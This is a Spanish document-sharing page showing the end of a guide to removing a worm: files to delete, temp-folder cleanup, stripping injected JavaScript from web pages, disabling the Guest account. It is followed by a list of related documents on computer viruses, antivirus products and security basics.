17 MMC.EXE LOAD.EXE RICHED20.DLL ADMIN.DLL WININIT.INI y borra todos los archivos de los directorios temporales: \Temp\ \Windows\Temp\ \Documents and Settings\%Username%\Local Settings\Temp Ahora reinicia. Borra los *.eml, *.nws infectados Borra el código JavaScript añadido al final de los HTM, HTML, ASP. Desactiva la cuenta "Guest" (invitado) y quítale los permisos de administrador. Comprueba los permisos de los recursos compartidos. Actualiza tu PC con los parches adecuados. BIBLIOGRAFIA Y AGRADECIMIENTOS Kriptópolis: Portal de seguridad y divulgación. The Wild List Organitation International: Organización de alerta sobre virus CyruxNET: Portal de información sobre fallos informáticos. guninski: Pagina de guninski.cazador de bugs. securityfocus: Portal sobre seguridad. Microsoft: Sin comentarios. Pandasoftware: Idem Slipstick Systems: Empresa de software de antivirus. hacksoft: Empresa peruana de antivirus. CERT: Centro de seguridad en internet GFI: Empresa de software de seguridad cknown: Idem. Mis agradecimientos a: Carlos Perez por guiarme entre la inmensa información, Antonio Valls Obrer por su interés y sus busquedas de última hora, Pablo Lemos Ochando y Francisco Garcia Montaner por su ayuda y consejos.

18

19

20

UNIVERSIDAD DE VALENCIA ESCUELA UNIVERSITARIA ESTUDIOS EMPRESARIALES DEPARTAMENTO DE DIRECCIÓN DE EMPRESAS

UNIVERSIDAD DE VALENCIA ESCUELA UNIVERSITARIA ESTUDIOS EMPRESARIALES DEPARTAMENTO DE DIRECCIÓN DE EMPRESAS UNIVERSIDAD DE VALENCIA ESCUELA UNIVERSITARIA ESTUDIOS EMPRESARIALES DE DEPARTAMENTO DE DIRECCIÓN DE EMPRESAS INFORMÀTICA APLICADA A LA GESTIÓN DE EMPRESAS Curso 1998-99 VIRUS INFORMÁTICOS Virus: El primer

Más detalles

LA IMPORTANCIA DE LOS ANTIVIRUS

LA IMPORTANCIA DE LOS ANTIVIRUS LA IMPORTANCIA DE LOS ANTIVIRUS QUÉ ES UN VIRUS?: Son programas que se introducen en nuestros ordenadores de formas muy diversas. Este tipo de programas son especiales ya que pueden producir efectos no

Más detalles

CAPACITACIÓN EN MANEJO DE ANTIVIRUS

CAPACITACIÓN EN MANEJO DE ANTIVIRUS Universidad del Cauca CAPACITACIÓN EN MANEJO DE ANTIVIRUS Autor: Andrea Pacheco División de Sistemas - División de Recursos Humanos 2007 Contenido 1. -virus... 3 1.1. -Virus y sus efectos sobre nuestro

Más detalles

Tema 17. Algunos aspectos de seguridad informática

Tema 17. Algunos aspectos de seguridad informática Tema 17. Algunos aspectos de seguridad informática Virus y otro malware Cortafuegos Criptografía Recomendaciones de seguridad generales Virus y otro malware Malware Virus Troyanos Keyloggers Programas

Más detalles

MEDIDAS DE PREVENCION CONTRA VIRUS

MEDIDAS DE PREVENCION CONTRA VIRUS MEDIDAS DE PREVENCION CONTRA VIRUS La seguridad consiste en asegurar que los recursos del sistema informático (información, programas) de una organización sean utilizados de la manera que se decidió y

Más detalles

Protegernos de los Virus

Protegernos de los Virus Protegernos de los Virus Qué es un Virus? Los virus de ordenador son programas que se reproducen o propagan a si mismos (estos últimos se llaman gusanos o "worms"), y suelen usarse para destruir, manipular

Más detalles

Algunos Conceptos. Clasificación de los virus informáticos:

Algunos Conceptos. Clasificación de los virus informáticos: Algunos Conceptos Caballos de Troya Programas que parecen de utilidad y que llevan o transportan rutinas que al activarse causan daños. No se reproducen a si mismos. Nombrados así por analogía con el caballo

Más detalles

VIRUS INFORMÁTICO. Nombre: Francisco Lara. Juan Vivanco. Profesor: Rodrigo Tapia

VIRUS INFORMÁTICO. Nombre: Francisco Lara. Juan Vivanco. Profesor: Rodrigo Tapia VIRUS INFORMÁTICO Nombre: Francisco Lara Juan Vivanco Profesor: Rodrigo Tapia Índice: CONTENIDO 1.- Origen:... 3 2.- Definición:... 4 3.- Técnicas de programación y tipos de daños ocasionados:... 5 4.-

Más detalles

VIRUS. Un virus informático es un programa de computadora, cuyo autor generalmente prefiere guardar el anonimato y que se caracterisa porque:

VIRUS. Un virus informático es un programa de computadora, cuyo autor generalmente prefiere guardar el anonimato y que se caracterisa porque: VIRUS En los últimos años ha aparecido en los medios de comunicación un verdadero alud de información sobre el fenómeno de virus informáticos, que ha creado un ambiente de cierta confusión. Por otra parte,

Más detalles

Seguridad [Virus] M. en C. Sergio Luis Pérez Pérez. UAM CUAJIMALPA, MÉXICO, D. F. Trimestre 13-P. Sergio Luis Pérez (UAM CUAJIMALPA) Seguridad 1 / 30

Seguridad [Virus] M. en C. Sergio Luis Pérez Pérez. UAM CUAJIMALPA, MÉXICO, D. F. Trimestre 13-P. Sergio Luis Pérez (UAM CUAJIMALPA) Seguridad 1 / 30 Seguridad [Virus] M. en C. Sergio Luis Pérez Pérez UAM CUAJIMALPA, MÉXICO, D. F. Trimestre 13-P Sergio Luis Pérez (UAM CUAJIMALPA) Seguridad 1 / 30 Posibles ataques a un sistema Posibles ataques a un sistema

Más detalles

Documentación sistema de Backups

Documentación sistema de Backups Documentación sistema de Backups En esta documentación se indicará detalladamente los pasos a seguir y los procesos utilizados para realizar copias de seguridad de los distintos archivos de un servidor

Más detalles

Ofimática Aplicada UNIDAD I : FUNDAMENTOS DEL ORDENADOR

Ofimática Aplicada UNIDAD I : FUNDAMENTOS DEL ORDENADOR Ofimática Aplicada UNIDAD I : FUNDAMENTOS DEL ORDENADOR Contenido: Arquitectura de un Pc Herramientas de Seguridad Herramientas Utilitarios Elaborado por: Lic. Ronald Méndez Arquitectura de un Pc Es el

Más detalles

Tipos de correo electrónico, pop y web. Clientes. Cómo se componen? Destinatarios, asunto, descripción (formas de escribir, firma), adjuntos.

Tipos de correo electrónico, pop y web. Clientes. Cómo se componen? Destinatarios, asunto, descripción (formas de escribir, firma), adjuntos. Colegio Bosque Del Plata Tecnología de la Información y las Comunicaciones UNIDAD 2 Transferencia de información electrónica: Correo electrónico E-mail: garcia.fernando.j@gmail.com Profesor: Fernando J.

Más detalles

ESPOCH - FACULTAD CIENCIAS BOLETÍN TÉCNICO INFORMÁTICO 02 22 de diciembre del 2008

ESPOCH - FACULTAD CIENCIAS BOLETÍN TÉCNICO INFORMÁTICO 02 22 de diciembre del 2008 VIRUS.... 1 INSTALACIÓN DE ANTIVIRUS... 2 ACTUALIZACIÓN SIN INTERNET.... 5 VIRUS. Al comportamiento extraño de nuestras PC, acostumbramos a decir que estamos infectados; y desde luego que algún tipo de

Más detalles

S eguridad Informática

S eguridad Informática 1- D efinición de Virus 2 - R eproducción de los Virus 3 - Tipos de Virus 4 - Los daños que causan 5 - Formas de contagio 6 Otros Malware 6 Antivirus y Firewall 7 - Medidas de Prevención 1- D efinición

Más detalles

SEGURIDAD EN INTERNET. MALWARE

SEGURIDAD EN INTERNET. MALWARE 1 SEGURIDAD EN INTERNET. MALWARE En Internet, como en casi todos los ámbitos de la vida, la seguridad, entendida tal cual se recoge en la Real Academia de la Lengua, es prácticamente imposible de conseguir;

Más detalles

AVG File Server. Manual del usuario. Revisión del documento 2015.08 (22.09.2015)

AVG File Server. Manual del usuario. Revisión del documento 2015.08 (22.09.2015) AVG File Server Manual del usuario Revisión del documento 2015.08 (22.09.2015) C opyright AVG Technologies C Z, s.r.o. Reservados todos los derechos. El resto de marcas comerciales son propiedad de sus

Más detalles

Sophos Control Center Ayuda

Sophos Control Center Ayuda Sophos Control Center Ayuda Versión: 4.1 Edición: marzo de 2010 Contenido 1 Acerca de Sophos Control Center...3 2 Introducción a Sophos Control Center...4 3 Comprobar que la red se encuentra protegida...8

Más detalles

Fases de Instalación de un Sistema Operativo

Fases de Instalación de un Sistema Operativo Fases de Instalación de un Sistema Operativo 1. Preparar el equipo para arrancar desde CD/DVD. 2. Preparación del Disco Duro: 3. Ejecutar el programa de instalación 4. Proporcionar el nombre y contraseña

Más detalles

Lo más habitual es que los virus permanezcan ocultos en archivos del tipo ejecutable (.exe y.com), pero pueden existir en otros formatos.

Lo más habitual es que los virus permanezcan ocultos en archivos del tipo ejecutable (.exe y.com), pero pueden existir en otros formatos. En informática, pequeño software que, al igual que un virus biológico, infecta a una computadora y se propaga en ella con diversos propósitos como daño, robo de información, molestia, etc. y por lo general

Más detalles

Ataques XSS en Aplicaciones Web

Ataques XSS en Aplicaciones Web Ataques XSS en Aplicaciones Web Education Project Antonio Rodríguez Romero Consultor de Seguridad Grupo isoluciones antonio.rodriguez@isoluciones.es Copyright 2007 The Foundation Permission is granted

Más detalles

SEGURIDAD EN INFORMÁTICA

SEGURIDAD EN INFORMÁTICA SEGURIDAD EN INFORMÁTICA LA SEGURIDAD Y SUS IMPLICACIONES Características principales de la seguridad en Internet: Confidencialidad. Sólo deben tener acceso a aquellas personas autorizadas para ello. Autentificación

Más detalles

Seguridad Informática ANTIVIRUS. Antivirus

Seguridad Informática ANTIVIRUS. Antivirus Seguridad Informática ANTIVIRUS Antivirus Que es un Antivirus??? Un antivirus es un programa informático específicamente diseñado para detectar bloquear y eliminar virus, utilizan diferentes técnicas para

Más detalles

ESET Mobile Antivirus

ESET Mobile Antivirus ESET Mobile Antivirus Manual de instalación y Guía del usuario we protect your digital worlds ESET Mobile Antivirus Copyright 2009 by ESET, spol. s r. o. ESET Smart Security ha sido desarrollado por ESET,

Más detalles

ADAPTACIÓN A LAS NUEVAS TECNOLOGÍAS INFORMÁTICAS (135 HORAS)

ADAPTACIÓN A LAS NUEVAS TECNOLOGÍAS INFORMÁTICAS (135 HORAS) ADAPTACIÓN A LAS NUEVAS TECNOLOGÍAS INFORMÁTICAS (135 HORAS) TEORÍA: (2 HORAS) 1. Elementos Fundamentales Ventanas WINDOWS (5 HORAS) Partes de una ventana Operaciones con ventana: Mover, Cambiar y Cerrar

Más detalles

MANUAL SOBRE SEGURIDAD EN INTERNET

MANUAL SOBRE SEGURIDAD EN INTERNET MANUAL SOBRE SEGURIDAD EN INTERNET VIRUS Los virus informáticos son programas que se propagan ocultos dentro de otro programa, correo electrónico, página web, o fichero, alterando el funcionamiento del

Más detalles

LOGO. Modulo 2. Carlos Villanueva

LOGO. Modulo 2. Carlos Villanueva SSO5501 Hardening de un Sistema Operativo de Red LOGO Modulo 2 Carlos Villanueva Introduccion Hardering, del ingles Endurecimiento, se refiere al proceso de segurizar un Sistema o Aplicación Objetivos

Más detalles

PROTECCIoN USB: javier.esparza@seguridadticmelilla.es seguridadticmelilla.es

PROTECCIoN USB: javier.esparza@seguridadticmelilla.es seguridadticmelilla.es PROTECCIoN USB:, Hoy en día los virus han mutado hacia nuevas formas, y vías de contaminación. Técnicamente son peores, y utilizan lenguajes de programación de más alto nivel, por lo que se necesitan menos

Más detalles

TIPOS DE VIRUS INFORMATICOS.

TIPOS DE VIRUS INFORMATICOS. TIPOS DE VIRUS INFORMATICOS. Todos los virus tienen en común una característica, y es que crean efectos perniciosos. A continuación te presentamos la clasificación de los virus informáticos, basada en

Más detalles

Detectar y solucionar infecciones en un sitio web

Detectar y solucionar infecciones en un sitio web Detectar y solucionar infecciones en un sitio web Cardenal Gardoki, 1 48008 BILBAO (Vizcaya) Teléfono: 902 012 199 www.hostalia.com Las infecciones que sufren los sitios web son uno de los principales

Más detalles

Crear un servidor Web en IIS

Crear un servidor Web en IIS Crear un servidor Web en IIS Qué es un servidor web? Un servidor web es un programa que se ejecuta continuamente en un computador, manteniéndose a la espera de peticiones de ejecución que le hará un cliente

Más detalles

Documentación Instalación NOD32 Server y Clientes

Documentación Instalación NOD32 Server y Clientes Documentación Instalación NOD32 Server y Clientes En esta documentación se indicará detalladamente la manera de instalar el antivirus NOD32 de forma distribuida desde un servidor de dominio a todos los

Más detalles

AGREGAR COMPONENTES ADICIONALES DE WINDOWS

AGREGAR COMPONENTES ADICIONALES DE WINDOWS INSTALACIÓN DE IIS EN WINDOWS XP El sistema está desarrollado para ejecutarse bajo la plataforma IIS de Windows XP. Por esta razón, incluimos la instalación de IIS (Servidor de Web) para la correcta ejecución

Más detalles

CONCEPTOS BASICOS DE VIRUS INFORMATICOS

CONCEPTOS BASICOS DE VIRUS INFORMATICOS estarás en línea con estas opciones ahora en el icono de abajo parecido a un candelabro dale un click y te mostrara una pantalla donde podrás añadir usuarios. CONCEPTOS BASICOS DE VIRUS INFORMATICOS Qué

Más detalles

VÍDEO intypedia006es LECCIÓN 6: MALWARE. AUTOR: Bernardo Quintero. Hispasec VirusTotal Founder

VÍDEO intypedia006es LECCIÓN 6: MALWARE. AUTOR: Bernardo Quintero. Hispasec VirusTotal Founder VÍDEO intypedia006es LECCIÓN 6: MALWARE AUTOR: Bernardo Quintero Hispasec VirusTotal Founder Hola, bienvenidos a intypedia. Hoy vamos a hablar del apasionante mundo de los códigos maliciosos y el negocio

Más detalles

Internet Information Server

Internet Information Server Internet Information Server Internet Information Server (IIS) es el servidor de páginas web avanzado de la plataforma Windows. Se distribuye gratuitamente junto con las versiones de Windows basadas en

Más detalles

Introducción a las Computadoras * Virus en las Computadoras * Prof. Ángel Torres

Introducción a las Computadoras * Virus en las Computadoras * Prof. Ángel Torres Introducción a las Computadoras * Virus en las Computadoras * Prof. Ángel Torres DEFINICIÓN DE VIRUS QUÉ SON LOS VIRUS? Los virus son programas que fueron desarrollados para que se introduzcan en nuestra

Más detalles

INFORME DE INFORMATICA

INFORME DE INFORMATICA REPUBLICA BOLIVARIANA DE VENEZUELA MINISTERIO DEL PODER POPULAR PARA LA EDUCACIÓN SUPERIOR INSITITUTO UNIVERSITARIO POLITÉCNICO SANTIAGO MARIÑO FACULTAD DE INGENIERÍA INFORME DE INFORMATICA Elaborado por:

Más detalles

Hostaliawhitepapers. Qué amenazas nos podemos encontrar por la red

Hostaliawhitepapers. Qué amenazas nos podemos encontrar por la red Qué amenazas nos podemos encontrar por la red Cardenal Gardoki, 1 48008 BILBAO (Vizcaya) Teléfono: 902 012 199 www.hostalia.com Todo el mundo que utiliza algún equipo informático ha escuchado alguna vez

Más detalles

ASISTENCIA TÉCNICA A LA SEGURIDAD INFORMÁTICA EN PYMES MANUAL MICROSOFT SECURITY ESSENTIALS

ASISTENCIA TÉCNICA A LA SEGURIDAD INFORMÁTICA EN PYMES MANUAL MICROSOFT SECURITY ESSENTIALS ASISTENCIA TÉCNICA A LA SEGURIDAD INFORMÁTICA EN PYMES MANUAL MICROSOFT SECURITY ESSENTIALS Microsoft Security Essentials Qué es? Microsoft Security Essentials tiene la potencia del motor Antimalware de

Más detalles

Seguridad Informática

Seguridad Informática Seguridad Informática Técnicas de Hacking y Seguridad Luis Yagüe EFOR Temario Comparación de Sistemas Operativos desde el punto de vista de la Seguridad Informática Firewalls, Proxys, DMZs. Virus Informáticos

Más detalles

Mail Disclaimer Versión 1.7.4

Mail Disclaimer Versión 1.7.4 Mail Disclaimer Versión 1.7.4 Resumen MailDisclaimer para Exchange Servidor nos permite añadir una funcionalidad completa, con la cual seremos capaces de insertar avisos de limitación de responsabilidad

Más detalles

Manual de usuario. Sophos Anti-Virus para Mac OS X, versión 4.8. Para usuarios de red e independientes con Mac OS X 10.

Manual de usuario. Sophos Anti-Virus para Mac OS X, versión 4.8. Para usuarios de red e independientes con Mac OS X 10. Manual de usuario Sophos Anti-Virus para Mac OS X, versión 4.8 Para usuarios de red e independientes con Mac OS X 10.2 o posterior Fecha del documento: mayo de 2006 Acerca de este manual En este manual

Más detalles

Los virus informáticos

Los virus informáticos SEGURIDAD DE LA INFORMACIÓN Es el estudio de los métodos y medios de protección de los sistemas de información y comunicaciones frente a amenazas de los siguientes tipos: - Sin intervención humana Amenazas

Más detalles

TEMA 42 Principales amenazas para la seguridad de los SI s: Intrusiones, virus, phishing, spam y otros..

TEMA 42 Principales amenazas para la seguridad de los SI s: Intrusiones, virus, phishing, spam y otros.. TEMA 42 Principales amenazas para la seguridad de los SI s: Intrusiones, virus, phishing, spam y otros.. 1 Introducción... 1 2 Programas maliciosos... 3 2.1 Métodos de infección:...3 2.2 Métodos de prevención...4

Más detalles

Poder Judicial de Tucumán Año 2013

Poder Judicial de Tucumán Año 2013 Internet y Correo electrónico El presente instructivo corresponde a una guía básica para el manejo de los programas y para la adquisición de conceptos en relación a estos utilitarios. No obstante ello,

Más detalles

Sophos Endpoint Security and Control Ayuda

Sophos Endpoint Security and Control Ayuda Sophos Endpoint Security and Control Ayuda Versión: 10.3 Edición: junio de 2014 Contenido 1 Acerca de Sophos Endpoint Security and Control...3 2 Acerca de la página de inicio...4 3 Grupos de Sophos...5

Más detalles

TUTORIAL GOOGLE DOCS

TUTORIAL GOOGLE DOCS TUTORIAL GOOGLE DOCS Las principales ventajas de Google Docs son: Nuestros documentos se almacenan en línea: esto nos permite acceder a ellos desde cualquier ordenador con conexión a internet, y compartirlos

Más detalles

INTRODUCCIÓN AL WEB. Pag. 1 de 10

INTRODUCCIÓN AL WEB. Pag. 1 de 10 INTRODUCCIÓN AL WEB La World Wide Web o simplemente WWW o Web es uno de los métodos más importantes de comunicación que existe en Internet. Consiste en un sistema de información basado en Hipertexto (texto

Más detalles

GUÍA DE AMENAZAS. Las diez amenazas más peligrosas de Internet

GUÍA DE AMENAZAS. Las diez amenazas más peligrosas de Internet GUÍA DE AMENAZAS Botnet Su accionar consiste en formar una red o grupo de computadoras zombis (infectados con malware), que son controlados por el propietario de los bots (atacante). Es decir, toman control

Más detalles

MANUAL DE USUARIO. Funcionalidad de Asistente PC de Movistar GUÍA BÁSICA DE MANEJO

MANUAL DE USUARIO. Funcionalidad de Asistente PC de Movistar GUÍA BÁSICA DE MANEJO MANUAL DE USUARIO Funcionalidad de Asistente PC de Movistar GUÍA BÁSICA DE MANEJO Índice Índice... 2 1 Introducción a Asistente PC de Movistar... 3 2 Funcionalidad recogida en Asistente PC de Movistar...

Más detalles

Manual del Usuario. Proasis LAN-Win. Versión 3.51. e-mail:desin@desin.com http://www.desin.com

Manual del Usuario. Proasis LAN-Win. Versión 3.51. e-mail:desin@desin.com http://www.desin.com Manual del Usuario Proasis LAN-Win Versión 3.51 e-mail:desin@desin.com http://www.desin.com Contenido CONTENIDO...2 INTRODUCCIÓN...3 INSTALACIÓN DEL SOFTWARE...4 INTRODUCCIÓN... 4 Cerrar aplicaciones....

Más detalles

Tiene capacidades de puerta trasera, lo cual permite que un usuario remoto pueda acceder al equipo infectado.

Tiene capacidades de puerta trasera, lo cual permite que un usuario remoto pueda acceder al equipo infectado. VIRUS MYDOOM A pesar de que el virus Mydoom no produce pérdida de datos, hemos creído oportuno realizar este informe sobre su acción dada la gran repercusión social y a la enorme propagación que está generando.

Más detalles

Mail movistar Empresa para Grundig GR980 Guía de Inicio Rápido

Mail movistar Empresa para Grundig GR980 Guía de Inicio Rápido Mail movistar Empresa para Grundig GR980 Guía de Inicio Rápido Reservados todos los derechos Guía de Inicio Rápido: Grundig GR980 Mail movistar Empresa (versión 5.0) Introducción Bienvenido a la guía de

Más detalles

MALWARE VIRUS INFORMÁTICOS

MALWARE VIRUS INFORMÁTICOS MALWARE VIRUS INFORMÁTICOS Autor : Gonzalo De Armas Revisado por : Cr. Carlos Moirano Agosto 2008 Virus Informáticos ÍNDICE Virus Informáticos 3 Orígenes 3 Tipos de virus 4 Virus que infectan archivos

Más detalles

Pág 1. Manual del usuario NETRETINA EVO. Helpdesk Software

Pág 1. Manual del usuario NETRETINA EVO. Helpdesk Software Pág 1 NETRETINA EVO Helpdesk Software Pág 2 NeTRetina EVO Índice de contenido 1. Información general del software 2. Requerimientos 3. Instalación y puesta en marcha 4. Módulos del software a. Servidor

Más detalles

Un resumen de la actividad de virus en enero del año 2015

Un resumen de la actividad de virus en enero del año 2015 Un A resumen partir del año 1992 de la actividad de virus en enero 1 Un resumen de la actividad de virus en enero 2 2 de febrero de 2015 Según los datos de los especialistas de la empresa Doctor Web, el

Más detalles

1. LA PROTECCIÓN DE NUESTRA INTIMIDAD: ALGUNOS CONSEJOS TÉCNICOS.

1. LA PROTECCIÓN DE NUESTRA INTIMIDAD: ALGUNOS CONSEJOS TÉCNICOS. 1. LA PROTECCIÓN DE NUESTRA INTIMIDAD: ALGUNOS CONSEJOS TÉCNICOS. En definitiva las cookies, son herramientas empleada por los servidores Web para almacenar y recuperar información acerca de sus visitantes.

Más detalles

Guía de instalación de Presto 2015.01 (20/07/2015)

Guía de instalación de Presto 2015.01 (20/07/2015) Guía de instalación de Presto 2015.01 (20/07/2015) Guía de instalación 1 Requisitos del sistema 1 Permisos necesarios 1 Presto 2 Instalación de Presto: Monopuesto 2 Instalación de Presto: Servidor de red

Más detalles

Ejemplo práctico de instalación del programa JCLIC en red

Ejemplo práctico de instalación del programa JCLIC en red Ejemplo práctico de instalación del programa JCLIC en red Una red local permite optimizar los recursos, tanto en relación al espacio (los programas se pueden colocar en el disco duro del servidor y ser

Más detalles

Puedes descargar los archivos de instalación de Windows SteadyState en el Centro de descarga Microsoft.

Puedes descargar los archivos de instalación de Windows SteadyState en el Centro de descarga Microsoft. Windows SteadyState Resumen Windows SteadyState es una utilidad de Microsoft que facilita el trabajo a quienes se encargan de la configuración y mantenimiento de equipos compartidos, de manera que todo

Más detalles

Edición de Ofertas Excel Manual de Usuario

Edición de Ofertas Excel Manual de Usuario Edición de Ofertas Excel Manual de Usuario Alfonso XI, 6 28014 Madrid F(+34) 91 524 03 96 www.omie.es Ref. MU_OfertasExcel.docx Versión 4.0 Fecha: 2012-11-26 ÍNDICE 1 INTRODUCCIÓN 3 2 CONSIDERACIONES DE

Más detalles

Guía de Inicio Rápido: HTC TOUCH FIND Mail movistar Empresa

Guía de Inicio Rápido: HTC TOUCH FIND Mail movistar Empresa Guía de Inicio Rápido: HTC TOUCH FIND Mail movistar Empresa Introducción Bienvenido a la guía de inicio rápido del servicio mail movistar Empresa, que le proporciona correo electrónico instantáneo en su

Más detalles

VIRUS Y SEGURIDAD TECNOLÓGICA EN LA DOCENCIA

VIRUS Y SEGURIDAD TECNOLÓGICA EN LA DOCENCIA VIRUS Y SEGURIDAD TECNOLÓGICA EN LA DOCENCIA AUTORÍA Mª JOSÉ PALOMAR SÁNCHEZ TEMÁTICA TIC S ETAPA ESO, BACHILLER, F.P. Resumen En este artículo se pretende dar una amplia visión sobre los virus informáticos

Más detalles

INSTITUTO POLITECNICO NACIONAL Unidad Profesional Interdisciplonaria de Ingenierìa y Ciencias Sociales y Admonistrativas

INSTITUTO POLITECNICO NACIONAL Unidad Profesional Interdisciplonaria de Ingenierìa y Ciencias Sociales y Admonistrativas INSTITUTO POLITECNICO NACIONAL Unidad Profesional Interdisciplonaria de Ingenierìa y Ciencias Sociales y Admonistrativas W8: wexplor VIROLOGÌA Y CRIPTOLOGÌA 4NM73 W8:INTERNET EXPLORER U5: FILE TRANSFER

Más detalles

MANUAL DE INSTALACIÓN Y CONFIGURACIÓN DE CLOUD BACKUP

MANUAL DE INSTALACIÓN Y CONFIGURACIÓN DE CLOUD BACKUP MANUAL DE INSTALACIÓN Y CONFIGURACIÓN DE CLOUD BACKUP INDICE 1.- Descarga del Software 2.- Instalación del Software 3.- Configuración del software y de la copia de seguridad 3.1.- Configuración inicial

Más detalles

Malware corto para software malintencionado es cualquier software utilizado para interrumpir, destruir y acceder a información sensible.

Malware corto para software malintencionado es cualquier software utilizado para interrumpir, destruir y acceder a información sensible. Informáticas I 2.4 Protegiendo un equipo cuando en la Web Existen un muchas vulnerabilidades cuando navegando por la web y probablemente has escuchado a todos pero qué significan realmente y cómo funcionan?

Más detalles

Manual TeamViewer Manager 6.0

Manual TeamViewer Manager 6.0 Manual TeamViewer Manager 6.0 Revision TeamViewer 6.0-954 Índice 1 Resumen... 2 1.1 Acerca de TeamViewer Manager... 2 1.2 Acerca de este manual... 2 2 Instalación y arranque inicial... 3 2.1 Instalación...

Más detalles

Sophos Enterprise Console Ayuda

Sophos Enterprise Console Ayuda Sophos Enterprise Console Ayuda Versión: 5.2.1, 5.2.2 Edición: septiembre de 2014 Contenido 1 Acerca de Enterprise Console...6 2 Descripción de la ventana de Enterprise Console...7 2.1 Ventana principal...7

Más detalles

Registra la actividad del usuario. Crea un informe de los programas usados, los ficheros abiertos, o las páginas web visitadas.

Registra la actividad del usuario. Crea un informe de los programas usados, los ficheros abiertos, o las páginas web visitadas. Qué es atseguridad? Funciones AT-Seguridad es un programa que cumple con 3 funciones básicas. Registra la actividad del usuario. Crea un informe de los programas usados, los ficheros abiertos, o las páginas

Más detalles

Software. 1- Mensajes de error 2- Drivers 3- Sistema Operativo 4- Virus 5- Aplicaciones 6- Definición del Monitor. 1- Mensajes de Error

Software. 1- Mensajes de error 2- Drivers 3- Sistema Operativo 4- Virus 5- Aplicaciones 6- Definición del Monitor. 1- Mensajes de Error Software TEMAS 1- Mensajes de error 2- Drivers 3- Sistema Operativo 4- Virus 5- Aplicaciones 6- Definición del Monitor 1- Mensajes de Error Mensaje Recomendación Al prender la computadora dice: Error en

Más detalles

MICROSOFT EXCHANGE 2007

MICROSOFT EXCHANGE 2007 MICROSOFT EXCHANGE 2007 En el momento de elaborar este documento en la URL http://technet.microsoft.com/enus/evalcenter/bb736128.aspx podíamos descargar una versión de prueba de Microsoft Exchange 2007.

Más detalles

Temario. Internet: Introducción - Uso del correo electrónico. Introducción. Historia. Características principales. Características principales

Temario. Internet: Introducción - Uso del correo electrónico. Introducción. Historia. Características principales. Características principales Internet: Introducción - Uso del correo electrónico Luciano H. Tamargo Temario involucrados Depto. de Ciencias e Ingeniería de la Computación Universidad Nacional del Sur, Bahía Blanca Introducción Historia

Más detalles

Administración de sitios Web. Capítulo 8. Servidores Web: Internet Information Server

Administración de sitios Web. Capítulo 8. Servidores Web: Internet Information Server 1 of 9 4/15/2010 9:47 PM Anterior Administración de sitios Web Capítulo 8. Servidores Web: Internet Information Server Siguiente En este punto, nos centraremos en las tareas de administración del servidor

Más detalles

Guía Rápida de Inicio

Guía Rápida de Inicio Guía Rápida de Inicio 1. Acerca de esta Guía Esta guía le ayudará a instalar y dar los primeros pasos con BitDefender Security for File Servers. Para disponer de instrucciones detalladas, por favor, diríjase

Más detalles

IS23 Mantenimiento de Instalaciones Informáticas Práctica 5. Mantenimiento preventivo (II)

IS23 Mantenimiento de Instalaciones Informáticas Práctica 5. Mantenimiento preventivo (II) IS23 Mantenimiento de Instalaciones Informáticas Práctica 5. Mantenimiento preventivo (II) 1 Objetivos Ingeniería Técnica Informática de Sistemas En la presente sesión se pretende familiarizar al alumno

Más detalles

GLOSARIO DE TERMINOS USADOS EN SEGURIDAD INFORMATICA

GLOSARIO DE TERMINOS USADOS EN SEGURIDAD INFORMATICA 1 de 7 21/04/2008 12:13 p.m. GLOSARIO DE TERMINOS USADOS EN SEGURIDAD INFORMATICA Active-X A B D E I K M N O P R S T V U W A Como la mayor parte de sitios web son documentos estáticos con poca interactividad,

Más detalles

1.- REDES E INTERNET TIPOS DE REDES COMUNICACIÓN POR INTERNET PROTOCOLO IP PROTOCOLO TCP

1.- REDES E INTERNET TIPOS DE REDES COMUNICACIÓN POR INTERNET PROTOCOLO IP PROTOCOLO TCP 1.- REDES E INTERNET TIPOS DE REDES LAN (Local Area Network). Enlazan ordenadores dentro de un área limitada: un departamento, una oficina, un edificio, etc La forma más sencilla para crear una LAN es

Más detalles

Soporte al. hardware

Soporte al. hardware REVISE CAPÍTULO 5 Ayuda de solución de problemas de hardware La solución de problemas de componentes es un proceso de eliminación. Debe usted eliminar metódicamente las causas posibles del problema. La

Más detalles

Sophos Enterprise Console Ayuda

Sophos Enterprise Console Ayuda Sophos Enterprise Console Ayuda Versión: 5.1 Edición: junio de 2012 Contenido 1 Acerca de Enterprise Console...3 2 Descripción de la ventana de Enterprise Console...4 3 Empezar a usar Sophos Enterprise

Más detalles

Botnet. Gusanos. Las diez amenazas más peligrosas de Internet. Consejos para prevenir la amenaza: Mantener las actualizaciones

Botnet. Gusanos. Las diez amenazas más peligrosas de Internet. Consejos para prevenir la amenaza: Mantener las actualizaciones Conocé las amenazas más peligrosas que actualmente existen en Internet. En esta guía podrán conocer y aprender junto a los chicos qué riesgos hay en la web y como prevenirlos Las diez amenazas más Botnet

Más detalles

INFORME EJECUTIVO ANÁLISIS FORENSE. Hostname: finanzas S.O.: Red Hat Linux versión 7.3 (Valhalla) Autor: Rafael García O.

INFORME EJECUTIVO ANÁLISIS FORENSE. Hostname: finanzas S.O.: Red Hat Linux versión 7.3 (Valhalla) Autor: Rafael García O. INFORME EJECUTIVO ANÁLISIS FORENSE Hostname: finanzas S.O.: Red Hat Linux versión 7.3 (Valhalla) Autor: Rafael García O. INTRODUCCIÓN La máquina finanzas, un servidor con S.O. Red Hat Linux versión 7.3

Más detalles

Ante todo, lo primero que debemos plantearnos es si realmente necesitamos hacer esta actualización.

Ante todo, lo primero que debemos plantearnos es si realmente necesitamos hacer esta actualización. UNIDAD 4: ACTUALIZACIÓN Y RESTAURACIÓN DE UN SISTEMA OPERATIVO MONOPUESTO. 1. INTRODUCCIÓN. Este tema está expresamente redactado para el módulo de Mantenimiento de sistemas y componentes informáticos

Más detalles

Lección 5: Bloc de notas Estudio de la aplicación Bloc de notas, utilizada para escribir sencillos documentos de texto de tamaño reducido.

Lección 5: Bloc de notas Estudio de la aplicación Bloc de notas, utilizada para escribir sencillos documentos de texto de tamaño reducido. Curso para conocer y aprender a manejar completamente el sistema operativo Microsoft Windows XP Professional, analizando desde el entorno del mismo hasta sus herramientas administrativas más complejas

Más detalles

Ayuda de Active System Console

Ayuda de Active System Console Ayuda de Active System Console Introducción... 1 Instalación... 2 Visualización de la información del sistema... 4 Umbrales de monitoreo del sistema... 5 Configuración de notificaciones por correo electrónico...

Más detalles

Ministerio de Educación, Cultura y Deporte. Aulas en Red. Windows. Módulo 6: Servicio Copias de seguridad

